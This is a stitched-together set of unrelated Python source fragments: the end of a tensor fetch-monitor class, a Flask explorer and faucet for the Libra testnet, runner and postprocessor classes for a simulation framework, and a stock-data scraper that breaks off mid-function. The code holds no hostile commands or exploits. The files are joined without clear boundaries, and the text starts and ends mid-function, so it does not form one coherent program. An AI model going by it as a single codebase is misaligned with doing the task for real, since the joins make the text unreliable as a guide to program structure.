                        lod = res_dict[user_name].lod()
                        if len(lod) > 0:
                            # LoD tensors cannot be losslessly converted
                            raise RuntimeError(
                                "Some of your fetched tensors hold LoD "
                                "information. They can not be completely "
                                "cast to Python ndarray. We can not return "
                                "LoDTensor itself directly, please choose "
                                "another targets")
                        if res_dict[user_name]._is_initialized():
                            res_dict[user_name] = np.array(res_dict[user_name])
                        else:
                            res_dict[user_name] = None
                    fetch_instance.handler(res_dict)

    def start(self):
        """
        start monitor,
        it will start a monitor thread.
        """
        with self.running_lock:
            self.running = True
        # daemon thread so the monitor never blocks interpreter shutdown;
        # `.daemon = True` replaces the deprecated setDaemon(True)
        self.fetch_thread.daemon = True
        self.fetch_thread.start()

    def stop(self):
        """Signal the worker thread to exit at its next wakeup."""
        with self.running_lock:
            self.running = False
|
Browser.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# execute in production with: nohup python3 Browser.py &> browser.log < /dev/null &
###########
# Imports #
###########
import re
import sys
import os
import traceback
import json
from time import sleep
from multiprocessing import Process
from rpc_client import get_acct_raw, get_acct_info, start_rpc_client_instance
from client import start_client_instance, do_cmd
from db_funcs import connect_to_db, get_latest_version, get_tx_from_db_by_version, get_all_account_tx, tx_db_worker
from stats import calc_stats
##############
# Flask init #
##############
from flask import Flask, request, redirect, send_from_directory
app = Flask(__name__, static_url_path='')
###############
# Definitions #
###############
ctr = 0 # counter of requests since last init
c2 = None # placeholder for connection object
header = '''<html><head><title>Libra Testnet Experimental Browser</title></head>
<body><h3>Experimental Libra testnet explorer by <a href="https://twitter.com/gal_diskin">@gal_diskin</a>
special thanks to Daniel Prinz for his help</h3>
<h3>Courtesy of <a href="https://www.firstdag.com">First Group</a></h3>
I developed this to make testing easier. I have no patiance ATM to make it pretty / faster / more stable.
I might continue to develop this if I see it has value to others...
If you liked this feel free to let me know and send me some tokens on the testnet at:
<a href='/account/e945eec0f64069d4f171d394aa27881fabcbd3bb6bcc893162e60ad3d6c9feec'>
e945eec0f64069d4f171d394aa27881fabcbd3bb6bcc893162e60ad3d6c9feec</a>
'''
index_template = open('index.html.tmpl', 'r', encoding='utf-8').read()
version_template = open('version.html.tmpl', 'r', encoding='utf-8').read()
version_error_template = header + "<h1>Couldn't read version details!<h1></body></html>"
stats_template = open('stats.html.tmpl', 'r', encoding='utf-8').read()
account_template = open('account.html.tmpl', 'r', encoding='utf-8').read()
faucet_template = open('faucet.html.tmpl', 'r', encoding='utf-8').read()
faucet_alert_template = '<div class="text-center"><div class="alert alert-danger" role="alert"><p>{0}</p></div></div>'
invalid_account_template = header + '<h1>Invalid Account format!<h1></body></html>'
################
# Helper funcs #
################
def update_counters():
    """Bump the global request counter and log it (flushed so the value
    shows up promptly in nohup-redirected logs)."""
    global ctr
    ctr = ctr + 1
    print('counter:', ctr)
    sys.stdout.flush()
def is_valid_account(acct):
    """Return True iff *acct* looks like an account id: exactly 64
    alphanumeric characters.

    NOTE(review): the pattern accepts any [A-Za-z0-9], not only hex digits;
    account ids are presumably hex -- confirm whether this should be
    tightened.
    """
    if len(acct) != 64 or re.fullmatch(r"[A-Za-z0-9]*", acct) is None:
        print("invalid Account:", acct)
        return False
    return True
def gen_tx_table_row(tx):
    """Render one transaction tuple as an HTML <tr> row.

    tx layout (by index, as consumed below): 0=version, 1=expiration date,
    2=source account, 3=destination account, 4=tx type, 5=amount.
    """
    version, expiration = str(tx[0]), str(tx[1])
    src, dst, amount = str(tx[2]), str(tx[3]), str(tx[5])
    type_icon = '🤝' if tx[4] == 'peer_to_peer_transaction' else '🛠'
    parts = [
        '<tr><td>',
        '<a href="/version/', version, '">', version, '</a></td><td>',
        expiration, '</td><td>',
        type_icon, '</td><td>',
        '<p class="text-monospace">',
        '<a href="/account/', src, '">', src, '</a> → ',
        '<a href="/account/', dst, '">', dst, '</a></p></td><td>',
        '<strong>', amount, ' Libra</strong></td>',
        '</tr>',
    ]
    return ''.join(parts)
def add_br_every64(s):
    """Break *s* into 64-character slices joined by '<br>' so long hex
    strings wrap inside HTML tables."""
    slices = [s[pos:pos + 64] for pos in range(0, len(s), 64)]
    return '<br>'.join(slices)
##########
# Routes #
##########
@app.route('/')
def index():
    """Home page: renders the index template with the latest ledger version."""
    update_counters()
    c2, conn = connect_to_db(config['DB_PATH'])
    bver = str(get_latest_version(c2))
    conn.close()
    return index_template.format(bver)
@app.route('/version/<ver>')
def version(ver):
    """Transaction-details page for ledger version *ver*.

    `?raw=1` additionally shows the raw program blob; the template link uses
    `not_raw` to toggle back. Returns an error page when *ver* is not an int
    or the transaction cannot be loaded.
    """
    update_counters()
    c2, conn = connect_to_db(config['DB_PATH'])
    bver = str(get_latest_version(c2))
    try:
        ver = int(ver)
        tx = get_tx_from_db_by_version(ver, c2)
    except:
        conn.close()
        return version_error_template
    # for toggle raw view
    if request.args.get('raw') == '1':
        extra = """<tr>
                    <td><strong>Program Raw</strong></td>
                    <td><pre>{0}</pre></td>
                   </tr>""".format(tx[-1])
        not_raw = '0'
    else:
        extra = ''
        not_raw = '1'
    conn.close()
    # BUG FIX: escape '<' in the program text as '&lt;'. The previous code
    # did replace('<', '<') -- a no-op (the '&lt;' entity was evidently lost
    # somewhere), leaving the value unescaped when injected into the page.
    return version_template.format(
        bver, *tx, add_br_every64(tx[12]), extra, not_raw, tx[-2].replace('<', '&lt;'))
@app.route('/account/<acct>')
def acct_details(acct):
    """Account page: current account state plus a paginated transaction
    table (page selected via `?page=N`, defaulting to 0)."""
    print(acct)
    update_counters()
    try:
        page = int(request.args.get('page'))
    except:
        # missing or non-numeric ?page= falls back to the first page
        page = 0
    if not is_valid_account(acct):
        return invalid_account_template
    c2, conn = connect_to_db(config['DB_PATH'])
    bver = str(get_latest_version(c2))
    acct_state_raw = get_acct_raw(acct)
    acct_info = get_acct_info(acct_state_raw)
    print('acct_info', acct_info)
    # BUG FIX: initialize tx_tbl before the try block. Previously it was
    # first assigned *after* get_all_account_tx(), so a failure there left
    # tx_tbl unbound and the format() below raised UnboundLocalError.
    tx_tbl = ''
    try:
        for tx in get_all_account_tx(c2, acct, page):
            tx_tbl += gen_tx_table_row(tx)
    except:
        print(sys.exc_info())
        traceback.print_exception(*sys.exc_info())
        print('error in building table')
    next_page = "/account/" + acct + "?page=" + str(page + 1)
    conn.close()
    return account_template.format(bver, *acct_info, tx_tbl, next_page)
@app.route('/search')
def search_redir():
    """Dispatch the search box: 64-char input is an account, anything else a version."""
    query = request.args.get('acct')
    if len(query) != 64:
        print('redir to tx', query)
        return redirect('/version/' + query)
    print('redir to account', query)
    return redirect('/account/' + query)
@app.route('/stats')
def stats():
    """Render aggregate chain statistics (all-time, last 24 hours, last hour)."""
    update_counters()
    c2, conn = connect_to_db(config['DB_PATH'])
    # BUGFIX: give ret a fallback value; previously a failure in calc_stats
    # left ret unbound and the `return ret` below raised NameError.
    ret = 'error computing stats'
    try:
        # get stats
        stats_all_time = calc_stats(c2)
        stats_24_hours = calc_stats(c2, limit = 3600 * 24)[5:]
        stats_one_hour = calc_stats(c2, limit = 3600)[5:]
        ret = stats_template.format(*stats_all_time, *stats_24_hours, *stats_one_hour)
    except Exception:
        print(sys.exc_info())
        traceback.print_exception(*sys.exc_info())
        print('error in stats')
    conn.close()
    return ret
@app.route('/faucet', methods=['GET', 'POST'])
def faucet():
    """Faucet page: on POST, mint and transfer the requested Libra amount.

    The account is validated with is_valid_account and the amount via float()
    before being passed to the CLI client, so neither reaches the command line
    unchecked.
    """
    update_counters()
    c2, conn = connect_to_db(config['DB_PATH'])
    bver = str(get_latest_version(c2))
    # BUGFIX: the connection was never closed (leaked one per request)
    conn.close()
    message = ''
    if request.method == 'POST':
        try:
            acct = request.form.get('acct')
            print(acct)
            amount = request.form.get('amount')
            print(amount)
            if float(amount) < 0:
                message = 'Amount must be >= 0'
            elif not is_valid_account(acct):
                message = 'Invalid account format'
            else:
                # mint to account 0, then transfer to the target account
                do_cmd('a mb 0 ' + str(float(amount)), p = p)
                do_cmd('tb 0 ' + acct + ' ' + str(float(amount)), p = p)
                acct_link = '<a href="/account/{0}">{0}</a>'.format(acct)
                message = 'Sent ' + amount + ' <small>Libra</small> to ' + acct_link
        except Exception:
            traceback.print_exception(*sys.exc_info())
            message = 'Invalid request logged!'
    if message:
        message = faucet_alert_template.format(message)
    return faucet_template.format(bver, message)
@app.route('/assets/<path:path>')
def send_asset(path):
    """Serve a static file from the local ``assets`` directory."""
    return send_from_directory('assets', path)
########
# Main #
########
if __name__ == '__main__':
    # Load deployment settings; the BROWSER env var picks a config section,
    # falling back to "PRODUCTION" when unset or unknown.
    with open('config.json', 'r') as f:
        config = json.load(f)
    try:
        config = config[os.getenv("BROWSER")]
    except:
        config = config["PRODUCTION"]
    print("system configuration:")
    print(json.dumps(config, indent=4))
    # Background process mirroring chain transactions into the local DB.
    tx_p = Process(target=tx_db_worker, args=(config['DB_PATH'], config['RPC_SERVER'], config['MINT_ACCOUNT']))
    tx_p.start()
    start_rpc_client_instance(config['RPC_SERVER'], config['MINT_ACCOUNT'])
    # Interactive CLI client handle; the faucet route uses this global `p`.
    p = start_client_instance(config['CLIENT_PATH'], config['ACCOUNT_FILE'])
    sleep(1)  # give the client a moment to come up before serving requests
    app.run(port=config['FLASK_PORT'], threaded=config['FLASK_THREADED'],
            host=config['FLASK_HOST'], debug=config['FLASK_DEBUG'])
""" Default Runner & Worker components
Local Runner
Memmap Interface (numpy)
Template Preprocessor
JSON Postprocessor
NumpytxtPostprocessor
HDF5Postprocessor
"""
from .runner import Runner, RunnerInterface
from .worker import Interface, Preprocessor, Postprocessor, Worker
import subprocess
from multiprocessing import Process
from time import sleep
import logging
import numpy as np
import os
from shutil import rmtree
# === Local Runner === #
@Runner.register('local')
class LocalRunner(Runner):
    """ Runner for executing simulations locally

    - forks the worker, thereby having less overhead (especially with a custom python Worker)
    - per default uses all available CPUs
    """
    def spawn_run(self, params=None, wait=False):
        """Start one run, as a shell subprocess (custom command / fork disabled)
        or as a forked Worker process; with ``wait=True`` block until it ends
        and drop it from ``self.runs``."""
        super().spawn_run(params, wait)
        if self.run_config['custom'] or not self.config['fork']:
            # subprocess path: the worker learns its run id via the environment
            env = self.env.copy()
            env['PROFIT_RUN_ID'] = str(self.next_run_id)
            if self.run_config['custom']:
                cmd = self.run_config['command']
            else:
                cmd = 'profit-worker'
            self.runs[self.next_run_id] = subprocess.Popen(cmd, shell=True, env=env, cwd=self.base_config['run_dir'])
            if wait:
                self.runs[self.next_run_id].wait()
                del self.runs[self.next_run_id]
        else:
            # fork path: build the Worker in-process, run it in a child process;
            # chdir into run_dir for the fork, then back to base_dir
            os.chdir(self.base_config['run_dir'])
            worker = Worker.from_config(self.run_config, self.next_run_id)
            process = Process(target=worker.main)
            self.runs[self.next_run_id] = (worker, process)
            process.start()
            if wait:
                process.join()
                del self.runs[self.next_run_id]
            os.chdir(self.base_config['base_dir'])
        self.next_run_id += 1
    def spawn_array(self, params_array, blocking=True):
        """ spawn an array of runs, maximum 'parallel' at the same time, blocking until all are done """
        if not blocking:
            raise NotImplementedError
        for params in params_array:
            self.spawn_run(params)
            # throttle: wait for a free slot before spawning the next run
            while len(self.runs) >= self.config['parallel']:
                sleep(self.config['sleep'])
                self.check_runs(poll=True)
        # drain: wait for all remaining runs to finish
        while len(self.runs):
            sleep(self.config['sleep'])
            self.check_runs(poll=True)
    def check_runs(self, poll=False):
        """ check the status of runs via the interface """
        self.interface.poll()
        if self.run_config['custom'] or not self.config['fork']:
            for run_id, process in list(self.runs.items()): # preserve state before deletions
                if self.interface.internal['DONE'][run_id]:
                    process.wait() # just to make sure
                    del self.runs[run_id]
                elif poll and process.poll() is not None:
                    # process exited without reporting DONE through the interface
                    del self.runs[run_id]
        else:
            for run_id, (worker, process) in list(self.runs.items()): # preserve state before deletions
                if self.interface.internal['DONE'][run_id]:
                    process.join() # just to make sure
                    del self.runs[run_id]
                elif poll and process.exitcode is not None:
                    process.terminate()
                    del self.runs[run_id]
    def cancel_all(self):
        """Terminate every tracked run and reset the bookkeeping dict."""
        if self.run_config['custom'] or not self.config['fork']:
            for process in self.runs.values():
                process.terminate()
        else:
            for worker, process in self.runs.values():
                process.terminate()
        self.runs = {}
# === Numpy Memmap Inerface === #
@RunnerInterface.register('memmap')
class MemmapRunnerInterface(RunnerInterface):
    """ Runner-Worker Interface using a memory mapped numpy array

    - expected to be very fast with the *local* Runner as each Worker can access the array directly (unverified)
    - expected to be inefficient if used on a cluster with a shared filesystem (unverified)
    - reliable
    - known issue: resizing the array (to add more runs) is dangerous, needs a workaround
      (e.g. several arrays in the same file)
    """
    def __init__(self, config, size, input_config, output_config, *, logger_parent: logging.Logger = None):
        """Create the zero-initialized backing file and map it read-write."""
        super().__init__(config, size, input_config, output_config, logger_parent=logger_parent)
        init_data = np.zeros(size, dtype=self.input_vars + self.internal_vars + self.output_vars)
        # NOTE(review): np.save appends '.npy' if the path lacks it, which would
        # make the np.load below fail — assumes config['path'] ends in '.npy'; confirm.
        np.save(self.config['path'], init_data)
        try:
            self._memmap = np.load(self.config['path'], mmap_mode='r+')
        except FileNotFoundError:
            self.runner.logger.error(
                f'{self.__class__.__name__} could not load {self.config["path"]} (cwd: {os.getcwd()})')
            raise
        # should return views on memmap
        self.input = self._memmap[[v[0] for v in self.input_vars]]
        self.output = self._memmap[[v[0] for v in self.output_vars]]
        self.internal = self._memmap[[v[0] for v in self.internal_vars]]
    def clean(self):
        """Remove the backing file if it exists."""
        if os.path.exists(self.config['path']):
            os.remove(self.config['path'])
@Interface.register('memmap')
class MemmapInterface(Interface):
    """ Runner-Worker Interface using a memory mapped numpy array

    counterpart to :py:class:`MemmapRunnerInterface`
    """
    def __init__(self, config, run_id: int, *, logger_parent: logging.Logger = None):
        """Open the shared memmap and slice out this run's record."""
        super().__init__(config, run_id, logger_parent=logger_parent)
        # ToDo: multiple arrays after another to allow extending the file dynamically
        try:
            self._memmap = np.load(self.config['path'], mmap_mode='r+')
        except FileNotFoundError:
            self.worker.logger.error(
                f'{self.__class__.__name__} could not load {self.config["path"]} (cwd: {os.getcwd()})')
            raise
        # views on the memmap: field names before 'DONE' are inputs, the
        # remainder (minus the internal 'DONE'/'TIME' columns) are outputs
        inputs, outputs = [], []
        k = 0
        for k, key in enumerate(self._memmap.dtype.names):
            if key == 'DONE':
                break
            inputs.append(key)
        for key in self._memmap.dtype.names[k:]:
            if key not in ['DONE', 'TIME']:
                outputs.append(key)
        self.input = self._memmap[inputs][run_id]
        self.output = self._memmap[outputs][run_id]
        self._data = self._memmap[run_id]
    def done(self):
        """Record runtime, mark THIS run as finished and flush to disk."""
        # BUGFIX: write only this run's record; assigning to
        # self._memmap['TIME'] / self._memmap['DONE'] stamped EVERY run as
        # done, which would make the runner consider all runs finished.
        self._data['TIME'] = self.time
        self._data['DONE'] = True
        self._memmap.flush()
    def clean(self):
        """Remove the backing file if it exists."""
        if os.path.exists(self.config['path']):
            os.remove(self.config['path'])
# === Template Preprocessor === #
@Preprocessor.register('template')
class TemplatePreprocessor(Preprocessor):
    """ Preprocessor which substitutes the variables with a given template

    - copies the given template directory to the target run directory
    - searches all files for variables templates of the form {name} and replaces them with their values
    - for file formats which use curly braces (e.g. json) the template identifier is {{name}}
    - substitution can be restricted to certain files by specifying `param_files`
    - relative symbolic links are converted to absolute symbolic links on copying
    - linked files are ignored with `param_files: all`, but if specified explicitly the link target is copied to the run
      directory and then substituted
    """
    def pre(self, data, run_dir):
        """Fill *run_dir* from the configured template and chdir into it."""
        # No call to super()! replaces the default preprocessing
        from profit.pre import fill_run_dir_single
        # start from a clean run directory
        if os.path.exists(run_dir):
            rmtree(run_dir)
        fill_run_dir_single(data, self.config['path'], run_dir, ignore_path_exists=True,
                            param_files=self.config['param_files'])
        # the worker subsequently executes from inside the run directory
        os.chdir(run_dir)
# === JSON Postprocessor === #
@Postprocessor.register('json')
class JSONPostprocessor(Postprocessor):
    """ Postprocessor to read output from a JSON file

    - variables are assumed to be stored with the correct key and able to be converted immediately
    - not extensively tested
    """
    def post(self, data):
        """Load the configured JSON file and copy each entry into *data* by key."""
        import json
        with open(self.config['path']) as json_file:
            parsed = json.load(json_file)
        for name in parsed:
            data[name] = parsed[name]
# === Numpy Text Postprocessor === #
@Postprocessor.register('numpytxt')
class NumpytxtPostprocessor(Postprocessor):
    """ Postprocessor to read output from a tabular text file (e.g. csv, tsv) with numpy ``genfromtxt``

    - the data is assumed to be row oriented
    - vector variables span several columns; list each variable's name only once in ``names``
    - entries of ``names`` that are not output variables are skipped when copying
    - any further options are forwarded to ``numpy.genfromtxt()``
    """
    def post(self, data):
        """Parse the configured text file and copy the known columns into *data*."""
        known = data.dtype.names
        # one float field per configured name; vector fields keep their shape
        dtype = []
        for name in self.config['names']:
            shape = data.dtype[name].shape if name in known else ()
            dtype.append((name, float, shape))
        try:
            raw = np.genfromtxt(self.config['path'], dtype=dtype, **self.config['options'])
        except OSError:
            # help debugging a missing output file by listing its directory
            self.logger.error(f'output file {self.config["path"]} not found')
            self.logger.info(f'cwd = {os.getcwd()}')
            dirname = os.path.dirname(self.config['path']) or '.'
            self.logger.info(f'ls {dirname} = {os.listdir(dirname)}')
            raise
        for name in self.config['names']:
            if name in known:
                data[name] = raw[name]
# === HDF5 Postprocessor === #
@Postprocessor.register('hdf5')
class HDF5Postprocessor(Postprocessor):
    """ Postprocessor to read output from a HDF5 file

    - variables are assumed to be stored with the correct key and able to be converted immediately
    - not extensively tested
    """
    def post(self, data):
        """Copy every dataset of the configured HDF5 file into *data* by key."""
        import h5py
        with h5py.File(self.config['path'], 'r') as h5file:
            for name in h5file.keys():
                data[name] = h5file[name]
import config, inspect, threading, time, logging, sys, ast, datetime, os, json
import pprint as pp
import zipfile as zf
import xml.etree.ElementTree as ET
from urllib.request import urlopen, Request
import urllib.error
from bs4 import BeautifulSoup
import requests
from modules.pyql import pyql
from wxStocks_modules import wxStocks_utilities as utils
from wxStocks_modules import wxStocks_db_functions as db
import sec_xbrl
from sec_xbrl import loadSECfilings
# something is clearly broken with additional data scrapes
def scrape_all_additional_data_prep(list_of_ticker_symbols): # Everything except basic yql and nasdaq
    """Queue every non-basic scrape (Yahoo + Morningstar) for the given tickers."""
    # best to stagger these to maximize scrape gaps, but i should automate this somehow.
    scrapers = [
        yf_analyst_estimates_scrape,
        ms_key_ratios_scrape,
        yf_annual_balance_sheet_scrape,
        ms_annual_balance_sheet_scrape,
        yf_annual_income_statement_scrape,
        ms_annual_income_statement_scrape,
        yf_annual_cash_flow_scrape,
        ms_annual_cash_flow_scrape,
    ]
    scrape_all_additional_data_execute(list_of_ticker_symbols, scrapers)
def scrape_all_additional_data_execute(list_of_ticker_symbols, list_of_functions):
    """Schedule every (ticker, scrape-function) pair on staggered timers.

    Consecutive calls are spaced config.ADDITIONAL_DATA_SCRAPE_SLEEP_TIME
    seconds apart; all functions for one ticker run before moving to the next
    ticker, which rotates target sites and slows per-site request rates.
    """
    if not list_of_ticker_symbols:
        return
    logging.info("updating: {}".format(list_of_ticker_symbols))
    scrape_sleep_time = config.ADDITIONAL_DATA_SCRAPE_SLEEP_TIME
    # NOTE: removed unused one_day / yesterdays_epoch locals from the original
    count = 1
    # Scrape all data for one stock at a time, switching functions to slow the
    # possibility of overscraping any single site.
    for ticker in list_of_ticker_symbols:
        for scrape_function in list_of_functions:
            # first timer fires after ~1s, each later one scrape_sleep_time apart
            delay = (count * scrape_sleep_time) - (scrape_sleep_time - 1)
            threading.Timer(delay, scrape_function, [ticker]).start()
            count += 1
#################### Nasdaq Ticker Symbol Scraper ##############################################
# no longer used
def download_ticker_symbols(): # from nasdaq.com
    """Download the company-list CSV from nasdaq.com for each configured
    exchange and return the parsed rows sorted by ticker symbol.

    NOTE(review): marked "no longer used" above; appears Python-2 era — see
    the inline notes on why it would fail under Python 3.
    """
    headers = config.HEADERS
    exchanges = config.STOCK_EXCHANGE_LIST
    exchange_data = []
    for exchange in exchanges:
        # Retrieve the webpage as a string
        response = Request("http://www.nasdaq.com/screening/companies-by-name.aspx?letter=0&exchange=%s&render=download" % exchange, headers=headers)
        try:
            page = urlopen(response)
        except urllib.error.HTTPError as e:
            # NOTE(review): when urlopen raises, `page` stays unbound and the
            # read below raises NameError — left as-is since the path is dead.
            logging.info(e.fp.read())
        content = page.read()
        content = content.splitlines()
        ticker_data_list = []
        for line in content:
            # NOTE(review): `line` is bytes on Python 3, so split('"') with a
            # str separator raises TypeError — more evidence this is dead code.
            dummy_list = line.split('"')
            parsed_dummy_list = []
            for datum in dummy_list:
                # drop bare separators and empty fragments
                if datum == ",":
                    pass
                elif not datum:
                    pass
                else:
                    parsed_dummy_list.append(datum)
            ticker_data_list.append(parsed_dummy_list)
        # Remove first unit of data which is:
        # ['Symbol',
        # 'Name',
        # 'LastSale',
        # 'MarketCap',
        # 'ADR TSO',
        # 'IPOyear',
        # 'Sector',
        # 'industry',
        # 'Summary Quote']
        ticker_data_list = ticker_data_list[1:]
        exchange_data = exchange_data + ticker_data_list
    exchange_data.sort(key = lambda x: x[0])
    logging.info("Returning ticker download data: {} number of items".format(len(exchange_data)))
    return exchange_data
# end no longer used
def nasdaq_full_ticker_list_downloader(): # from nasdaq.com
    ''' returns list of the form [nasdaq_ticker, firm_name, exchange, is_etf_bool]'''
    headers = config.HEADERS
    # weirdly this webpage displays different than the csv it downloads...
    url = "ftp://ftp.nasdaqtrader.com/SymbolDirectory/nasdaqtraded.txt"
    nasdaq_tickers = return_webpage(url, headers, delay=0)
    big_list = str(nasdaq_tickers).split("\r\n")
    ticker_meta_list = [x.split("|") for x in big_list]
    # row 0 is the pipe-delimited header; the last two rows are trailer lines,
    # none of which carry ticker data
    ticker_data_list = ticker_meta_list[1:-2]
    return_list = []
    for data in ticker_data_list:
        try:
            ticker = data[1].replace("$", "^")
        except IndexError:
            # BUGFIX: skip malformed rows entirely; previously execution fell
            # through and the data[2] access below raised an uncaught IndexError.
            logging.info(data)
            continue
        firm_name = data[2]
        # column 3: listing exchange code
        exchange = None
        exchange_letter = data[3]
        if exchange_letter == "Q":
            exchange = "NASDAQ"
        elif exchange_letter == "N":
            exchange = "NYSE"
        elif exchange_letter == "Z":
            exchange = "BATS"
        elif exchange_letter == "P":
            exchange = "NYSE"
        elif exchange_letter == "A":
            exchange = "NYSEmkt"
        else:
            logging.info(data)
        # column 5: ETF flag ("Y"/"N"; blank means unknown)
        etf_bool = None
        etf_letter = data[5]
        if etf_letter == "N":
            etf_bool = False
        elif etf_letter == "Y":
            etf_bool = True
        elif etf_letter == " ":
            pass
        else:
            logging.info("{}: {}".format(data, data[5]))
        # columns 9/10 (CQS symbol, NASDAQ symbol) are intentionally unused
        data_to_return = [ticker, firm_name, exchange, etf_bool]
        return_list.append(data_to_return)
    return return_list
# suggestion from Soncrates
def nasdaq_stock_csv_url_and_headers_generator(exchanges=config.STOCK_EXCHANGE_LIST): # from nasdaq.com
    """Yield (url, headers) pairs: one company CSV per exchange, then the ETF CSV.

    Side effect: config.CURRENT_EXCHANGE_FOR_NASDAQ_SCRAPE tracks the exchange
    currently being scraped and is reset to None before the ETF url.
    """
    headers = config.HEADERS
    for exchange in exchanges:
        exchange_code = exchange.upper()
        config.CURRENT_EXCHANGE_FOR_NASDAQ_SCRAPE = exchange_code
        yield "http://www.nasdaq.com/screening/companies-by-name.aspx?letter=0&exchange={}&render=download".format(exchange_code), headers
    config.CURRENT_EXCHANGE_FOR_NASDAQ_SCRAPE = None
    # yield etfs
    yield "http://www.nasdaq.com/investing/etfs/etf-finder-results.aspx?download=Yes", headers
def return_webpage(url, headers, delay=15): # I set the delay here at 15
    """Fetch *url* after an optional anti-blocking delay and return the raw body (bytes).

    NOTE(review): the *headers* argument is accepted but never attached to the
    request — behavior preserved here; confirm before changing.
    """
    logging.info('Scraping nasdaq.com')
    if delay:
        logging.info("Sleeping for %d seconds to prevent potential blocking of your ip address. You may change this as a keyword argument of this function." % delay)
        time.sleep(delay)
    page = urlopen(Request(url))
    return page.read()
def nasdaq_csv_stock_data_parsing_generator(csv_file):
    """Yield one {column_name: value} dict per data row of a nasdaq CSV download.

    csv_file: raw bytes of the CSV. Row 0 must be a header; its fields become
    the dict keys (quotes stripped, spaces replaced with underscores). The
    header list persists across iterations via ``dict_list``. Calls
    sys.exit() when the header format is unrecognized.
    """
    rows_list = csv_file.splitlines()
    for row_num in range(len(rows_list)):
        logging.info(rows_list[row_num])
        row_data = rows_list[row_num].decode('utf-8').split('",')
        if row_num == 0:
            # header row: establish the column names used for every later row
            dict_list = row_data
            if not dict_list:
                logging.error("Error: no description row exists for nasdaq data download")
                return
            else:
                if not dict_list[-1]:
                    # here i will remove the empty string at the end of the typical list i get
                    # this is the default list i get:
                    #[u'"Symbol"',
                    # u'"Name"',
                    # u'"LastSale"',
                    # u'"MarketCap"',
                    # u'"IPOyear"',
                    # u'"Sector"',
                    # u'"industry"',
                    # u'"Summary Quote"',
                    # u'']
                    dict_list.pop()
                elif str(dict_list[0]) == "Symbol,Name,LastSale,NetChange,NetChangeDirection,PercentChange,1YrPercentChange":
                    # alternate (ETF) header variant: comma-separated in one field;
                    # re-quote each name so downstream stripping behaves the same
                    dict_list = dict_list[0].split(',')
                    dict_list = ['"' + x + '"' for x in dict_list]
                else:
                    # unknown header layout: abort the whole program
                    logging.info(dict_list[-1])
                    sys.exit()
            continue
        dict_to_return = {}
        if not row_data:
            continue
        else:
            # NOTE(review): assumes each data row has at least len(dict_list)
            # fields; a short row would raise IndexError here — confirm.
            for theoretical_csv_column_number in range(len(dict_list)):
                if row_data[theoretical_csv_column_number] not in [None, u""]:
                    dict_to_return[str(dict_list[theoretical_csv_column_number]).replace('"', "").replace(" ","_")] = str(row_data[theoretical_csv_column_number]).replace('"', "")
            if dict_to_return:
                yield dict_to_return
# suggestion from Soncrates
def convert_nasdaq_csv_to_stock_objects():
    """Download each exchange's CSV and create/refresh Stock objects in the db.

    Iterates the (url, headers) pairs from
    nasdaq_stock_csv_url_and_headers_generator, parses every row, and writes
    the fields onto Stock objects inside a single db transaction. Option
    chains, called options and warrants are skipped; LastSale is stored as a
    float (or None when unparsable).
    """
    with db.db.transaction() as connection:
        for url, headers in nasdaq_stock_csv_url_and_headers_generator():
            if len(config.STOCK_EXCHANGE_LIST) < 5: # it should be
                nasdaq_csv = return_webpage(url, headers, delay=1)
            else: # incase this program grows beyond my wildest dreams
                nasdaq_csv = return_webpage(url, headers)
            for stock_dict in nasdaq_csv_stock_data_parsing_generator(nasdaq_csv):
                # stock_dict keys: Sector, LastSale, Summary_Quote, Name,
                # industry, Symbol, MarketCap, IPOyear
                if ("$" in stock_dict.get("Symbol")): # this is an "option chain" and we will ignore
                    continue
                if ("/CL" in stock_dict.get("Symbol")): # this is a called option or warrant and we will ignore
                    continue
                if ("/W" in stock_dict.get("Symbol")): # this is a warrant and we will ignore
                    continue
                if " " in stock_dict.get("Symbol"):
                    stock_dict["Symbol"] = stock_dict.get("Symbol").replace(" ", "")
                stock = db.create_new_Stock_if_it_doesnt_exist(stock_dict.get("Symbol"), current_large_transaction=True)
                # BUGFIX: print() returns None, so the original
                # logging.info(print(len(...))) always logged "None";
                # log the stock count directly instead.
                logging.info(len(db.root.Stock))
                stock.firm_name = stock_dict.get("Name")
                for attribute in stock_dict:
                    if attribute not in ["Symbol", "Summary_Quote", "LastSale"]:
                        datum = stock_dict.get(attribute)
                        if datum:
                            db.set_Stock_attribute(stock, attribute, datum, "_na", connection=True)
                    elif attribute == "LastSale":
                        try:
                            datum = float(stock_dict.get(attribute))
                            db.set_Stock_attribute(stock, attribute, datum, "_na", connection=True)
                        except (TypeError, ValueError):
                            # non-numeric or missing price: store None explicitly
                            db.set_Stock_attribute(stock, attribute, None, "_na", connection=True)
                stock.Exchange_na = config.CURRENT_EXCHANGE_FOR_NASDAQ_SCRAPE
                stock.last_nasdaq_scrape_update = time.time()
#################### Rank and Filed Scrapers "_rd" ##############################################
def download_cik_ticker_csv_mapping():
    """Download the rankandfiled.com CIK↔ticker CSV and return its raw bytes.

    Raises urllib.error.HTTPError when the download fails (after logging the
    server's error body).
    """
    headers = config.HEADERS
    url = "http://rankandfiled.com/static/export/cik_ticker.csv"
    response = Request(url, headers=headers)
    try:
        page = urlopen(response)
    except urllib.error.HTTPError as e:
        # BUGFIX: log the error body, then re-raise; previously the error was
        # swallowed and the read below raised NameError on the unbound `page`.
        logging.info(e.fp.read())
        raise
    content = page.read()
    return content
def parse_cik_ticker_mapping(rf_content):
    """Parse the rankandfiled cik_ticker export into a ticker-keyed dict.

    rf_content: raw bytes of the pipe-delimited CSV whose header row starts
    with 'CIK' (columns like CIK|Name|Ticker|Exchange|SIC|...). Returns
    {ticker: {column_name: stripped-value-or-None}}.
    """
    header_fields = []
    ticker_keyed_cik_data_dict = {}
    for raw_line in rf_content.splitlines():
        text = raw_line.decode("utf-8")
        if text.startswith("CIK"):
            # header row: remember the column names for all following rows
            header_fields = ['{}'.format(field) for field in text.split('|')]
            continue
        # empty fields become None, others are whitespace-stripped
        values = [field.strip() if field else None for field in text.split('|')]
        row = {name: value for name, value in zip(header_fields, values)}
        ticker_keyed_cik_data_dict[row.get("Ticker")] = row
    logging.warning("pprint next line")
    pp.pprint(ticker_keyed_cik_data_dict)
    return ticker_keyed_cik_data_dict
def add_cik_data_to_stocks(ticker_keyed_cik_data_dict):
    """Write CIK/rank-and-filed fields onto Stock objects inside one db transaction.

    ticker_keyed_cik_data_dict: {ticker: {column_name: value}} as produced by
    parse_cik_ticker_mapping. Unknown tickers are created only when the row
    has an Exchange value; otherwise the row is skipped.
    """
    with db.db.transaction() as connection:
        for ticker_key, value_dict in ticker_keyed_cik_data_dict.items():
